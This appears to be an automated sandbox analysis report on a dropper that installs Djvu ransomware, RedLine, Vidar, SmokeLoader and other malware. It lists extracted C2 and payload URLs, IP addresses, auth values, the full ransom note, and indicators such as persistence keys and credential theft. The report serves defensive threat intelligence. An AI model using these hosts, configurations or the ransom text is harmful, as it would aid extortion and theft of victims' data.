djvu | c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb

Analysis

max time kernel
65s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-03-2022 12:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe
Size

9.0MB
MD5

de821f1df3d78b3bdf70614bfc2e30cd
SHA1

45bcb47f02d2e49c234c33938ec4bf4d618953a6
SHA256

c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb
SHA512

5e9a1f83818f86a2e03894ffc13a2c5d61c0324268c463eab518c6113721f1798b11b65d6ad2de13cb1832db6cdbeb6337e8b9cb3226d4d1b2cef0e2db4ea9ef

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

1177

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
1177

Extracted

Family

redline

185.11.73.22:45202

5.206.224.220:81

Attributes

auth_value
4811a2f23005637a45b22c416ef83c5f

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

pizzadlyath

65.108.101.231:14648

Attributes

auth_value
e6050567aab45ec7a388fed4947afdc2

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

redline

193.106.191.253:4752

Attributes

auth_value
c6b533a917f5c6a3e6d1afd9c29f81c6

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/420-332-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/420-329-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/420-336-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/420-339-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1600-172-0x0000000005190000-0x0000000005AB6000-memory.dmp	family_glupteba
behavioral2/memory/1600-173-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/4164-179-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/4652-190-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2972	1496	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	1496	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 17 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2212-212-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/memory/4236-235-0x0000000000310000-0x0000000000495000-memory.dmp	family_redline
behavioral2/memory/4236-237-0x0000000000310000-0x0000000000495000-memory.dmp	family_redline
behavioral2/memory/2212-238-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/memory/4236-246-0x0000000000310000-0x0000000000495000-memory.dmp	family_redline
behavioral2/memory/2212-245-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/memory/4236-249-0x0000000000310000-0x0000000000495000-memory.dmp	family_redline
behavioral2/memory/2212-280-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/memory/2212-248-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/memory/4940-309-0x0000000000420000-0x0000000000440000-memory.dmp	family_redline
behavioral2/memory/3484-321-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1236-320-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2152-345-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2276-349-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1240-352-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4964-306-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2212-215-0x0000000000D00000-0x0000000000E4E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 3424 created 1600 3424 svchost.exe Info.exe
PID 3424 created 4652 3424 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 3424 created 1600	3424	svchost.exe	Info.exe
PID 3424 created 4652	3424	svchost.exe	csrss.exe

OnlyLogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3016-250-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1324-265-0x00000000009B0000-0x0000000000C5A000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 31 IoCs

Processes:

md9_1sjm.exeSoCleanInst.exeFolder.exeInfo.exeUpdbdate.exeFile.exeInstall.exepub2.exeFiles.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeInfo.execsrss.exeSiyhjvx8roDNKlkVX5NDbA6H.exebcylemzAO4qDXd6pqS0laVSa.exePL7j4pRQF4MLUafa_hJonMjD.exenetsh.exeinjector.exeuTs9yKYb6SzJrTI1Rk3FjQl7.exejVbODZnSng89kIDwQa2GYabp.exehMp18012XfHVlbAMF8lh_Txk.exeMfN_VZYkE5btMp7mOPU23HYJ.exeHogstkJZ7FRsznPeYYEJ2HPz.exeinjector.exe8our3GnN1MK8nVk9KvhYIFMu.exeVDavGkeFBQltxK7B4K2HycqO.exe6KIaTjAnVAuAqNMgILerqRz5.execX4dN1L1ydZ1pLFIf8VaB8Ur.exefqG_utQ5KupwZRBNOoVuc18u.exeEF0G7M76F1AK415.exe

pid	process
4408	md9_1sjm.exe
4136	SoCleanInst.exe
4032	Folder.exe
1600	Info.exe
1224	Updbdate.exe
2320	File.exe
4972	Install.exe
4292	pub2.exe
4384	Files.exe
1192	Folder.exe
4200	jfiag3g_gg.exe
3540	jfiag3g_gg.exe
4164	Info.exe
4652	csrss.exe
1072	Siyhjvx8roDNKlkVX5NDbA6H.exe
4492	bcylemzAO4qDXd6pqS0laVSa.exe
3016	PL7j4pRQF4MLUafa_hJonMjD.exe
5000	netsh.exe
5040	injector.exe
4848	uTs9yKYb6SzJrTI1Rk3FjQl7.exe
2212	jVbODZnSng89kIDwQa2GYabp.exe
4836	hMp18012XfHVlbAMF8lh_Txk.exe
5092	MfN_VZYkE5btMp7mOPU23HYJ.exe
3528	HogstkJZ7FRsznPeYYEJ2HPz.exe
3904	injector.exe
4236	8our3GnN1MK8nVk9KvhYIFMu.exe
2020	VDavGkeFBQltxK7B4K2HycqO.exe
5008	6KIaTjAnVAuAqNMgILerqRz5.exe
2260	cX4dN1L1ydZ1pLFIf8VaB8Ur.exe
4040	fqG_utQ5KupwZRBNOoVuc18u.exe
4180	EF0G7M76F1AK415.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\hMp18012XfHVlbAMF8lh_Txk.exe	upx
C:\Users\Admin\Pictures\Adobe Films\hMp18012XfHVlbAMF8lh_Txk.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Folder.exeFile.exec8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2284 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2284	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DivineBrook = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

109 api.db-ip.com
206 api.db-ip.com
239 ipinfo.io
24 ip-api.com
106 ipinfo.io
204 ipinfo.io
241 api.db-ip.com
105 ipinfo.io
110 api.db-ip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

jVbODZnSng89kIDwQa2GYabp.exe8our3GnN1MK8nVk9KvhYIFMu.exe

pid process

2212 jVbODZnSng89kIDwQa2GYabp.exe
4236 8our3GnN1MK8nVk9KvhYIFMu.exe
Drops file in Windows directory 2 IoCs

Processes:

Info.exe

description ioc process

File opened for modification C:\Windows\rss Info.exe
File created C:\Windows\rss\csrss.exe Info.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
109	api.db-ip.com
206	api.db-ip.com
239	ipinfo.io
24	ip-api.com
106	ipinfo.io
204	ipinfo.io
241	api.db-ip.com
105	ipinfo.io
110	api.db-ip.com

pid	process
2212	jVbODZnSng89kIDwQa2GYabp.exe
4236	8our3GnN1MK8nVk9KvhYIFMu.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3740	2284	WerFault.exe	rundll32.exe
5012	1600	WerFault.exe	Info.exe
4856	1600	WerFault.exe	Info.exe
5064	1600	WerFault.exe	Info.exe
5020	1600	WerFault.exe	Info.exe
4944	1600	WerFault.exe	Info.exe
4492	1600	WerFault.exe	Info.exe
3092	1600	WerFault.exe	Info.exe
2076	1600	WerFault.exe	Info.exe
3628	1600	WerFault.exe	Info.exe
1416	1600	WerFault.exe	Info.exe
1880	1600	WerFault.exe	Info.exe
1032	1600	WerFault.exe	Info.exe
2044	1600	WerFault.exe	Info.exe
2968	1600	WerFault.exe	Info.exe
420	1600	WerFault.exe	Info.exe
2340	1600	WerFault.exe	Info.exe
4380	1600	WerFault.exe	Info.exe
4532	1600	WerFault.exe	Info.exe
628	1600	WerFault.exe	Info.exe
3060	1600	WerFault.exe	Info.exe
484	1600	WerFault.exe	Info.exe
480	4164	WerFault.exe	Info.exe
1512	4164	WerFault.exe	Info.exe
4480	4164	WerFault.exe	Info.exe
4632	4164	WerFault.exe	Info.exe
2972	4164	WerFault.exe	Info.exe
4988	4164	WerFault.exe	Info.exe
3512	4164	WerFault.exe	Info.exe
4484	4164	WerFault.exe	Info.exe
612	4164	WerFault.exe	Info.exe
4048	4164	WerFault.exe	Info.exe
4896	4164	WerFault.exe	Info.exe
4588	4164	WerFault.exe	Info.exe
1192	4164	WerFault.exe	Info.exe
4228	4164	WerFault.exe	Info.exe
3476	4164	WerFault.exe	Info.exe
2276	4164	WerFault.exe	Info.exe
1096	4652	WerFault.exe	csrss.exe
2036	4652	WerFault.exe	csrss.exe
3944	4652	WerFault.exe	csrss.exe
1608	4652	WerFault.exe	csrss.exe
2364	4652	WerFault.exe	csrss.exe
3904	4652	WerFault.exe	csrss.exe
3588	4652	WerFault.exe	csrss.exe
2060	4652	WerFault.exe	csrss.exe
548	4652	WerFault.exe	csrss.exe
2800	4652	WerFault.exe	csrss.exe
3672	4652	WerFault.exe	csrss.exe
4256	4652	WerFault.exe	csrss.exe
1876	4652	WerFault.exe	csrss.exe
2284	4652	WerFault.exe	csrss.exe
3800	4652	WerFault.exe	csrss.exe
4616	4652	WerFault.exe	csrss.exe
4220	4652	WerFault.exe	csrss.exe
480	4652	WerFault.exe	csrss.exe
1408	4652	WerFault.exe	csrss.exe
1168	4652	WerFault.exe	csrss.exe
5036	4652	WerFault.exe	csrss.exe
4116	4652	WerFault.exe	csrss.exe
4404	4652	WerFault.exe	csrss.exe
3288	4652	WerFault.exe	csrss.exe
3632	2020	WerFault.exe
2712	3016	WerFault.exe	PL7j4pRQF4MLUafa_hJonMjD.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2112 schtasks.exe
4064 schtasks.exe
3544 schtasks.exe
3980 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

6132 timeout.exe
736 timeout.exe
5484 timeout.exe
4540 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

548 taskkill.exe
2592 taskkill.exe
1100 taskkill.exe
1440 taskkill.exe

pid	process
2112	schtasks.exe
4064	schtasks.exe
3544	schtasks.exe
3980	schtasks.exe

pid	process
6132	timeout.exe
736	timeout.exe
5484	timeout.exe
4540	timeout.exe

pid	process
548	taskkill.exe
2592	taskkill.exe
1100	taskkill.exe
1440	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Info.exe
